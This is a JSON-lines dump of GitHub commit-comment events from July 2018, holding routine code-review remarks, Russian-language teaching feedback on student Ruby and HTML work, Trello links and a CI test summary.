{"id":"7989121766","type":"CommitCommentEvent","actor":{"login":"shilery"},"repo":{"name":"shilery/django"},"payload":{"comment":{"id":29764428,"position":9,"line":9,"path":"introduction.py","commit_id":"c9cb34a335cd24d1d6a7855abc2a3f932541a431","created_at":"2018-07-19T13:21:43Z","updated_at":"2018-07-19T13:21:43Z","author_association":"OWNER","body":"hello\r\n"}},"created_at":"2018-07-19T13:21:43Z"}
{"id":"7989123644","type":"CommitCommentEvent","actor":{"login":"freak4pc"},"repo":{"name":"Arcovv/RxSwift"},"payload":{"comment":{"id":29764430,"position":19,"line":36,"path":"RxCocoa/Common/ControlTarget.swift","commit_id":"0b12d21d34aa184a82b28967dd4b505e16cf2ba2","created_at":"2018-07-19T13:22:02Z","updated_at":"2018-07-19T13:22:02Z","author_association":"NONE","body":"I'm not sure this would build with the latest Xcode 9 GM ? Did you try it? Or just on Xcode 10?"}},"created_at":"2018-07-19T13:22:02Z"}
{"id":"7989128064","type":"CommitCommentEvent","actor":{"login":"zufrieden"},"repo":{"name":"antistatique/epfl-theme"},"payload":{"comment":{"id":29764442,"position":null,"line":null,"path":null,"commit_id":"8542bcd8676214e8f98a776c29c3e1b3f3f7e8a8","created_at":"2018-07-19T13:22:47Z","updated_at":"2018-07-19T13:22:47Z","author_association":"MEMBER","body":"cc. @knuch :-) "}},"created_at":"2018-07-19T13:22:47Z"}
{"id":"7989172905","type":"CommitCommentEvent","actor":{"login":"gi097"},"repo":{"name":"madcyph3r/WhatsApi-Android-1"},"payload":{"comment":{"id":29764557,"position":null,"line":null,"path":null,"commit_id":"9908099be1a73257a76b2d4c07ddc755860b9e2e","created_at":"2018-07-19T13:30:12Z","updated_at":"2018-07-19T13:30:12Z","author_association":"NONE","body":"This project is no longer maintained."}},"created_at":"2018-07-19T13:30:12Z"}
{"id":"7989173604","type":"CommitCommentEvent","actor":{"login":"lharzenetter"},"repo":{"name":"OpenTOSCA/winery"},"payload":{"comment":{"id":29764560,"position":66,"line":243,"path":"org.eclipse.winery.model.tosca/src/main/java/org/eclipse/winery/model/tosca/TBoundaryDefinitions.java","commit_id":"f2fbee343a11ce913a002bed057e9453a2da9885","created_at":"2018-07-19T13:30:18Z","updated_at":"2018-07-19T13:30:18Z","author_association":"MEMBER","body":"Instead of copy paste this, create an ?abstract class, interface? which handles this stuff and refactor NodeTypes, etc."}},"created_at":"2018-07-19T13:30:18Z"}
{"id":"7989177103","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764567,"position":3,"line":3,"path":"css/bootstrap-reboot.css","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:30:50Z","updated_at":"2018-07-19T13:30:50Z","author_association":"NONE","body":"Прилетел boostrap. Отлично.\r\nИ занял много строк. Обычно в репозиториях не лежит код библиотек. Расскажу на следующем занятии об npm."}},"created_at":"2018-07-19T13:30:50Z"}
{"id":"7989179984","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764572,"position":12,"line":12,"path":"index.html","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:31:17Z","updated_at":"2018-07-19T13:31:17Z","author_association":"NONE","body":"Скрипты лучше подключать в конце файла"}},"created_at":"2018-07-19T13:31:17Z"}
{"id":"7989182579","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764579,"position":30,"line":30,"path":"index.html","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:31:43Z","updated_at":"2018-07-19T13:31:43Z","author_association":"NONE","body":"может поиграемся с background css :)"}},"created_at":"2018-07-19T13:31:43Z"}
{"id":"7989184642","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764584,"position":44,"line":44,"path":"index.html","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:32:05Z","updated_at":"2018-07-19T13:32:05Z","author_association":"NONE","body":"Хитрец, сделал на bootstrap)"}},"created_at":"2018-07-19T13:32:05Z"}
{"id":"7989187496","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764590,"position":57,"line":57,"path":"index.html","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:32:34Z","updated_at":"2018-07-19T13:32:34Z","author_association":"NONE","body":"лучше использовать тире и более говорящее имя\r\nskills-container"}},"created_at":"2018-07-19T13:32:34Z"}
{"id":"7989190269","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrKartman/Portfolio"},"payload":{"comment":{"id":29764598,"position":91,"line":91,"path":"mycss/mycss.css","commit_id":"838e3db64f684e961c7f5ae34b1fc3b6df49040b","created_at":"2018-07-19T13:33:03Z","updated_at":"2018-07-19T13:33:03Z","author_association":"NONE","body":"id лучше не использовать"}},"created_at":"2018-07-19T13:33:03Z"}
{"id":"7989192151","type":"CommitCommentEvent","actor":{"login":"swetha-ashok"},"repo":{"name":"madcyph3r/WhatsApi-Android-1"},"payload":{"comment":{"id":29764603,"position":null,"line":null,"path":null,"commit_id":"9908099be1a73257a76b2d4c07ddc755860b9e2e","created_at":"2018-07-19T13:33:22Z","updated_at":"2018-07-19T13:33:22Z","author_association":"NONE","body":"That means it won't work anymore\n\nOn Thu, Jul 19, 2018, 7:00 PM Giovanni Terlingen <notifications@github.com>\nwrote:\n\n> This project is no longer maintained.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/madcyph3r/WhatsApi-Android-1/commit/9908099be1a73257a76b2d4c07ddc755860b9e2e#commitcomment-29764557>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Akq8qtHdAJ7q2QS3PrxxdaXntDCM54daks5uIInkgaJpZM4VWW92>\n> .\n>\n"}},"created_at":"2018-07-19T13:33:22Z"}
{"id":"7989195933","type":"CommitCommentEvent","actor":{"login":"mtuncer"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":29764611,"position":30,"line":647,"path":"src/backend/distributed/executor/multi_utility.c","commit_id":"ae7076cb1348f4e144c89d80ef1f0ab20bbd9ebe","created_at":"2018-07-19T13:34:00Z","updated_at":"2018-07-19T13:34:00Z","author_association":"MEMBER","body":"in `AlterTableStmt` part we used `if (ConstraintIsAForeignKey(constraint->conname, relationId))` instead of this. \r\n\r\nwhy do we need to use 2 different methods ?\r\n "}},"created_at":"2018-07-19T13:34:00Z"}
{"id":"7989201872","type":"CommitCommentEvent","actor":{"login":"the-cybersapien"},"repo":{"name":"cheydavis/QuizAppMath2"},"payload":{"comment":{"id":29764626,"position":80,"line":80,"path":"app/src/main/java/com/example/android/quizappmath/MainActivity.java","commit_id":"f464707a4877eff849599802cd023cfd4dd19186","created_at":"2018-07-19T13:35:02Z","updated_at":"2018-07-19T13:35:02Z","author_association":"NONE","body":"The `Toast.makeText` method returns a Toast object.\r\nYou'll need to call the `show()` method on that object itself, and not the Toast class.\r\n\r\nExample:\r\n```"}},"created_at":"2018-07-19T13:35:02Z"}
{"id":"7989205846","type":"CommitCommentEvent","actor":{"login":"sliute"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29764640,"position":48,"line":48,"path":"mod/book/tests/behat/bookmark.feature","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-19T13:35:42Z","updated_at":"2018-07-19T13:35:42Z","author_association":"NONE","body":":lipstick: \r\n\r\n`Scenario: Can navigate back to previous session chapter\r\n    Given I log in as \"student\"\r\n    And I am on \"Course 1\" course homepage\r\n    And I click on \"Book 1\" \"link\"\r\n    Then I should not see \"Want to pick up where you left off?\"\r\n    When I click on \".booknext\" \"css_element\"\r\n    Then I should see \"Chapter 2\" in the \"#region-main\" \"css_element\"\r\n    When I am on \"Course 1\" course homepage\r\n    And I click on \"Book 1\" \"link\"\r\n    Then I should see \"Want to pick up where you left off?\"\r\n    When I press \"Yes please!\"\r\n    Then I should see \"Chapter 2\" in the \"#region-main\" \"css_element\"`"}},"created_at":"2018-07-19T13:35:42Z"}
{"id":"7989224135","type":"CommitCommentEvent","actor":{"login":"anthares101"},"repo":{"name":"jesusrp98/strawberry"},"payload":{"comment":{"id":29764681,"position":null,"line":null,"path":null,"commit_id":"161d3613f21dc3f0a2087d415ddffd25069ba8f1","created_at":"2018-07-19T13:38:45Z","updated_at":"2018-07-19T13:38:45Z","author_association":"CONTRIBUTOR","body":"Arguments number is also controlled now"}},"created_at":"2018-07-19T13:38:45Z"}
{"id":"7989225276","type":"CommitCommentEvent","actor":{"login":"Sianaisp"},"repo":{"name":"Sianaisp/github-slideshow"},"payload":{"comment":{"id":29764683,"position":null,"line":null,"path":null,"commit_id":"24f3862a8b7ffac65d86488f57ef92cb3676c59a","created_at":"2018-07-19T13:38:57Z","updated_at":"2018-07-19T13:38:57Z","author_association":"OWNER","body":"blablabla"}},"created_at":"2018-07-19T13:38:57Z"}
{"id":"7989230615","type":"CommitCommentEvent","actor":{"login":"Sianaisp"},"repo":{"name":"Sianaisp/github-slideshow"},"payload":{"comment":{"id":29764699,"position":1,"line":1,"path":"hello","commit_id":"24f3862a8b7ffac65d86488f57ef92cb3676c59a","created_at":"2018-07-19T13:39:52Z","updated_at":"2018-07-19T13:39:52Z","author_association":"OWNER","body":"lalala"}},"created_at":"2018-07-19T13:39:52Z"}
{"id":"7989235457","type":"CommitCommentEvent","actor":{"login":"stewest"},"repo":{"name":"AmazeeLabs/d8-starter-composer"},"payload":{"comment":{"id":29764702,"position":null,"line":null,"path":null,"commit_id":"7e3699f1888ca58be91c88ef94c35c8b61b4e416","created_at":"2018-07-19T13:40:40Z","updated_at":"2018-07-19T13:40:40Z","author_association":"CONTRIBUTOR","body":"Ah ok, I see now. This is so that one can use \"gulp images\" and gulp will compress all images in your theme... "}},"created_at":"2018-07-19T13:40:40Z"}
{"id":"7989236599","type":"CommitCommentEvent","actor":{"login":"ataffanel"},"repo":{"name":"bitcraze/crazyflie2-exp-template-electronics"},"payload":{"comment":{"id":29764704,"position":null,"line":null,"path":null,"commit_id":"4b9c17eed7c40844e29567e07368f678914e247b","created_at":"2018-07-19T13:40:51Z","updated_at":"2018-07-19T13:40:51Z","author_association":"MEMBER","body":"No, we have only release the PDF schematic of the full Crazyflie 2 so far."}},"created_at":"2018-07-19T13:40:51Z"}
{"id":"7989239935","type":"CommitCommentEvent","actor":{"login":"pciaku"},"repo":{"name":"pciaku/ztest"},"payload":{"comment":{"id":29764709,"position":null,"line":null,"path":null,"commit_id":"acff52a9cc028a67757fbe4350b2fa935530c712","created_at":"2018-07-19T13:41:24Z","updated_at":"2018-07-19T13:41:24Z","author_association":"OWNER","body":"I want to go back"}},"created_at":"2018-07-19T13:41:24Z"}
{"id":"7989241035","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29764712,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-19T13:41:35Z","updated_at":"2018-07-19T13:41:35Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2781 of 2942 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 58 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.53%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T13:41:35Z"}
{"id":"7989242596","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29764716,"position":52,"line":52,"path":"pom.xml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-19T13:41:51Z","updated_at":"2018-07-19T13:41:51Z","author_association":"NONE","body":"Could you give me the exact dependency code to add? I tried just changing it to 1.6.2 and it doesn't exist. I tried changing the groupId to the github repo, also no luck. Unless you want me to install it locally?"}},"created_at":"2018-07-19T13:41:51Z"}
{"id":"7989246215","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29764722,"position":null,"line":null,"path":null,"commit_id":"5877525b1dd4ddcf5038cdc9bdead9279bbe0907","created_at":"2018-07-19T13:42:26Z","updated_at":"2018-07-19T13:42:26Z","author_association":"COLLABORATOR","body":"We should make this a macro to be honest, and add it to all relevant situations"}},"created_at":"2018-07-19T13:42:26Z"}
{"id":"7989260287","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29764750,"position":49,"line":49,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-19T13:44:45Z","updated_at":"2018-07-19T13:44:45Z","author_association":"NONE","body":"I think I'm going to go with the latter option: _If the config is broken, I'm not ganna continue here._ Because otherwise that means having to match the defaults in this file _and_ in the config.yml file."}},"created_at":"2018-07-19T13:44:45Z"}
{"id":"7989265002","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29764763,"position":20,"line":20,"path":"discriminant.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T13:45:32Z","updated_at":"2018-07-19T13:45:32Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-19T13:45:32Z"}
{"id":"7989266202","type":"CommitCommentEvent","actor":{"login":"asifrizwanubx"},"repo":{"name":"u-blox/mbed-os"},"payload":{"comment":{"id":29764768,"position":8,"line":168,"path":"features/FEATURE_LWIP/lwip-interface/LWIPMemoryManager.cpp","commit_id":"d5e4d17aa28ae2f37660d6f93099fbf278c0e538","created_at":"2018-07-19T13:45:44Z","updated_at":"2018-07-19T13:45:44Z","author_association":"NONE","body":"verifications required"}},"created_at":"2018-07-19T13:45:44Z"}
{"id":"7989267145","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29764771,"position":null,"line":null,"path":null,"commit_id":"0e6b5855e8266b27d03141fdc63324f0d8da6c77","created_at":"2018-07-19T13:45:53Z","updated_at":"2018-07-19T13:45:53Z","author_association":"CONTRIBUTOR","body":"@ondrejmirtes What an amount of work in recent days!\r\nHave you considered making phpstan error-free with Laravel facades?\r\n"}},"created_at":"2018-07-19T13:45:53Z"}
{"id":"7989270449","type":"CommitCommentEvent","actor":{"login":"i-shiryaev"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29764777,"position":70,"line":70,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T13:46:26Z","updated_at":"2018-07-19T13:46:26Z","author_association":"OWNER","body":"Пробую этот вариант при правке кода, и если использовать второй вариант, то в тело unless код не заходит вообще. Но с .nil? всё работает"}},"created_at":"2018-07-19T13:46:26Z"}
{"id":"7989270774","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29764778,"position":15,"line":15,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-19T13:46:29Z","updated_at":"2018-07-19T13:46:29Z","author_association":"NONE","body":"хорошо, убедил, пускай остается такая проверка\r\n"}},"created_at":"2018-07-19T13:46:29Z"}
{"id":"7989270810","type":"CommitCommentEvent","actor":{"login":"gandrewstone"},"repo":{"name":"BitcoinUnlimited/BitcoinUnlimited"},"payload":{"comment":{"id":29764779,"position":18,"line":80,"path":"src/graphene.h","commit_id":"bc1bec450cad7a42299681b22b077059dcc4672e","created_at":"2018-07-19T13:46:29Z","updated_at":"2018-07-19T13:46:29Z","author_association":"COLLABORATOR","body":"excessive block size may change.  We need this to use the \"excessiveBlockSize\" global variable."}},"created_at":"2018-07-19T13:46:29Z"}
{"id":"7989273941","type":"CommitCommentEvent","actor":{"login":"asifrizwanubx"},"repo":{"name":"u-blox/mbed-os"},"payload":{"comment":{"id":29764791,"position":10,"line":169,"path":"features/FEATURE_LWIP/lwip-interface/LWIPMemoryManager.h","commit_id":"d5e4d17aa28ae2f37660d6f93099fbf278c0e538","created_at":"2018-07-19T13:47:01Z","updated_at":"2018-07-19T13:47:01Z","author_association":"NONE","body":"why we need this?"}},"created_at":"2018-07-19T13:47:01Z"}
{"id":"7989274018","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29764792,"position":null,"line":null,"path":null,"commit_id":"1811623bd0b73c7aa5a7773886d45ab947055f2c","created_at":"2018-07-19T13:47:02Z","updated_at":"2018-07-19T13:47:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add \"edit\" button to detail pages.](https://trello.com/c/JlMuIiCX/49-add-edit-button-to-detail-pages)"}},"created_at":"2018-07-19T13:47:02Z"}
{"id":"7989282391","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29764821,"position":7,"line":7,"path":"discriminant.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T13:48:24Z","updated_at":"2018-07-19T13:48:24Z","author_association":"NONE","body":"Значение могут быть не целыми. Нужно использовать to_f, потому-что может выйти не правильный результат при делении\r\n```\r\n2.5.0 :002 > 3 / 2\r\n => 1\r\n2.5.0 :003 > 3.to_f / 2\r\n => 1.5\r\n2.5.0 :004 >\r\n```"}},"created_at":"2018-07-19T13:48:24Z"}
{"id":"7989284389","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29764822,"position":null,"line":null,"path":null,"commit_id":"1811623bd0b73c7aa5a7773886d45ab947055f2c","created_at":"2018-07-19T13:48:42Z","updated_at":"2018-07-19T13:48:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create the API to edit details.](https://trello.com/c/Dlnkm8Cw/50-create-the-api-to-edit-details)"}},"created_at":"2018-07-19T13:48:42Z"}
{"id":"7989284581","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29764823,"position":6,"line":28,"path":"lesson1/quadratic_equation.rb","commit_id":"7e4d9ac52cb8860a7c1830d8044e4d761247d46e","created_at":"2018-07-19T13:48:44Z","updated_at":"2018-07-19T13:48:44Z","author_association":"NONE","body":"Math.sqrt(d) все равно вычисляется дважды, нужно вычислить и занести в переменную, а затем использовать ее"}},"created_at":"2018-07-19T13:48:44Z"}
{"id":"7989286069","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29764824,"position":7,"line":7,"path":"discriminant.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T13:48:58Z","updated_at":"2018-07-19T13:48:58Z","author_association":"NONE","body":"да, и можно не использовать chomp, если дальше to_i/to_f. Потому-что to_i и to_f сами убирают символ новой строки\r\n\r\n"}},"created_at":"2018-07-19T13:48:58Z"}
{"id":"7989292413","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29764839,"position":9,"line":9,"path":"discriminant.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T13:50:00Z","updated_at":"2018-07-19T13:50:00Z","author_association":"NONE","body":"Здесь и дальше\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-19T13:50:00Z"}
{"id":"7989297268","type":"CommitCommentEvent","actor":{"login":"alexiacobws"},"repo":{"name":"openbsd/src"},"payload":{"comment":{"id":29764852,"position":null,"line":null,"path":null,"commit_id":"31c76a1f562c0d7d634bf0131bab8c2de524814c","created_at":"2018-07-19T13:50:47Z","updated_at":"2018-07-19T13:50:47Z","author_association":"NONE","body":"typo in https://github.com/openbsd/src/blob/31c76a1f562c0d7d634bf0131bab8c2de524814c/usr.bin/ssh/sshconnect.c#L318"}},"created_at":"2018-07-19T13:50:47Z"}
{"id":"7989300330","type":"CommitCommentEvent","actor":{"login":"asifrizwanubx"},"repo":{"name":"u-blox/mbed-os"},"payload":{"comment":{"id":29764855,"position":3,"line":3,"path":"features/netsocket/WiFiSoftAPInterface.h","commit_id":"f9a1a10db654d04b6acb4735dfed6a2e06da2f3f","created_at":"2018-07-19T13:51:17Z","updated_at":"2018-07-19T13:51:17Z","author_association":"NONE","body":"comments formating req"}},"created_at":"2018-07-19T13:51:17Z"}
{"id":"7989304688","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29764870,"position":null,"line":null,"path":null,"commit_id":"0e6b5855e8266b27d03141fdc63324f0d8da6c77","created_at":"2018-07-19T13:51:57Z","updated_at":"2018-07-19T13:51:57Z","author_association":"MEMBER","body":"@szepeviktor Have you seen this? https://medium.com/@nunomaduro/introducing-larastan-alpha-c7582ff366a6"}},"created_at":"2018-07-19T13:51:57Z"}
{"id":"7989305146","type":"CommitCommentEvent","actor":{"login":"CamJN"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29764872,"position":40,"line":500,"path":"src/cxx_supportlib/ServerKit/HttpServer.h","commit_id":"12c37f062edfc5e8ffa209f2f45f550f91e66b8e","created_at":"2018-07-19T13:52:02Z","updated_at":"2018-07-19T13:52:02Z","author_association":"CONTRIBUTOR","body":"Lines 492-500 you return `Channel::Result(event.consumed, false);` in every branch of the condition, so this could be simplified to:\r\n```\r\nif (!req->bodyChannel.acceptingInput() && req->bodyChannel.mayAcceptInputLater()) {\r\n  client->input.stop();\r\n  req->bodyChannel.consumedCallback = onRequestBodyChannelConsumed;\r\n} \r\nreturn Channel::Result(event.consumed, false);\r\n```"}},"created_at":"2018-07-19T13:52:02Z"}
{"id":"7989305744","type":"CommitCommentEvent","actor":{"login":"asifrizwanubx"},"repo":{"name":"u-blox/mbed-os"},"payload":{"comment":{"id":29764876,"position":4,"line":170,"path":"features/FEATURE_LWIP/lwip-interface/LWIPMemoryManager.h","commit_id":"a1415deec96e186df5db69f47e5c0642605a4df5","created_at":"2018-07-19T13:52:09Z","updated_at":"2018-07-19T13:52:09Z","author_association":"NONE","body":"same previous one"}},"created_at":"2018-07-19T13:52:09Z"}
{"id":"7989314111","type":"CommitCommentEvent","actor":{"login":"tobscure"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29764902,"position":20,"line":52,"path":"migrations/2018_01_11_155200_change_discussions_b8_columns.php","commit_id":"90792abf103c5d0ed505edd6dc759728fe1e1f0b","created_at":"2018-07-19T13:53:28Z","updated_at":"2018-07-19T13:53:28Z","author_association":"MEMBER","body":"what's going on with these key names? some have the table name prefix, one has `_foreign` suffix..."}},"created_at":"2018-07-19T13:53:28Z"}
{"id":"7989316726","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29764911,"position":null,"line":null,"path":null,"commit_id":"9b740bbb90b28a8ac37c662ef3e6b8d31c9eaed7","created_at":"2018-07-19T13:53:52Z","updated_at":"2018-07-19T13:53:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor ViewMember Page](https://trello.com/c/nS3BQR7j/71-refactor-viewmember-page)"}},"created_at":"2018-07-19T13:53:52Z"}
{"id":"7989317167","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29764912,"position":null,"line":null,"path":null,"commit_id":"30e84597f6572619e41492da3f3b776488e1e858","created_at":"2018-07-19T13:53:57Z","updated_at":"2018-07-19T13:53:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor ViewMember Page](https://trello.com/c/nS3BQR7j/71-refactor-viewmember-page)"}},"created_at":"2018-07-19T13:53:57Z"}
{"id":"7989317517","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29764914,"position":null,"line":null,"path":null,"commit_id":"032eb4c5bfe562c413a7849601a8660ca3b50332","created_at":"2018-07-19T13:54:00Z","updated_at":"2018-07-19T13:54:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor ViewMember Page](https://trello.com/c/nS3BQR7j/71-refactor-viewmember-page)"}},"created_at":"2018-07-19T13:54:00Z"}
{"id":"7989318918","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29764916,"position":null,"line":null,"path":null,"commit_id":"7f9805947fb33d3ce939c4c584900d374da10cd9","created_at":"2018-07-19T13:54:14Z","updated_at":"2018-07-19T13:54:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fitness Parameters -- Record New](https://trello.com/c/M7gz2QI0/64-fitness-parameters-record-new)"}},"created_at":"2018-07-19T13:54:14Z"}
{"id":"7989320833","type":"CommitCommentEvent","actor":{"login":"unseenmagik"},"repo":{"name":"unseenmagik/MagikCogs"},"payload":{"comment":{"id":29764921,"position":null,"line":null,"path":null,"commit_id":"2761306bd6e7ada023dd3d743a7f107b58e9e620","created_at":"2018-07-19T13:54:32Z","updated_at":"2018-07-19T13:54:32Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-19T13:54:32Z"}
{"id":"7989329219","type":"CommitCommentEvent","actor":{"login":"TheCodez"},"repo":{"name":"avast-tl/retdec"},"payload":{"comment":{"id":29764954,"position":6,"line":5,"path":"scripts/retdec-tests-runner.py","commit_id":"6c0449dd2b3a4f0032b3b5538eb41b8acc84e9f0","created_at":"2018-07-19T13:55:48Z","updated_at":"2018-07-19T13:55:48Z","author_association":"CONTRIBUTOR","body":"`colorama` has to be installed using `pip` package manager, right?"}},"created_at":"2018-07-19T13:55:48Z"}
{"id":"7989329424","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29764955,"position":4,"line":1098,"path":"cmd/runtimetest/main.go","commit_id":"c29e92cd78e1464ebfc7f7c10844b88e17368b80","created_at":"2018-07-19T13:55:50Z","updated_at":"2018-07-19T13:55:50Z","author_association":"MEMBER","body":"I would still check if `configMount.Source != \"\"`"}},"created_at":"2018-07-19T13:55:50Z"}
{"id":"7989334951","type":"CommitCommentEvent","actor":{"login":"MrJons"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29764965,"position":60,"line":591,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-19T13:56:41Z","updated_at":"2018-07-19T13:56:41Z","author_association":"NONE","body":"moved it to a renderer"}},"created_at":"2018-07-19T13:56:41Z"}
{"id":"7989335397","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29764970,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-19T13:56:45Z","updated_at":"2018-07-19T13:56:45Z","author_association":"MEMBER","body":"I understand the opinions and I'm sure we have problems, I just think the solutions are tradeoffs between different problems. New messages cause problems for new server and old clients (maybe not if client uses new firebird.msg). New parameters cause problems for old server and new clients.\r\n\r\nIn this specific case, isc_field_name could be used. We will not have a right message waiting every time, and evolution of error messages should happen.\r\n\r\nMessage \"<Missing arg #1 - possibly status vector overflow>\" could be replaced by \"<Missing arg #1 - possibly client and server mismatch>\".\r\n\r\nServer could send message texts for the client, and client could use it if the message is not present in its own firebird.msg or they have different count of parameters (`@N`).\r\n\r\n@hvlad I didn't tought yet about backport."}},"created_at":"2018-07-19T13:56:45Z"}
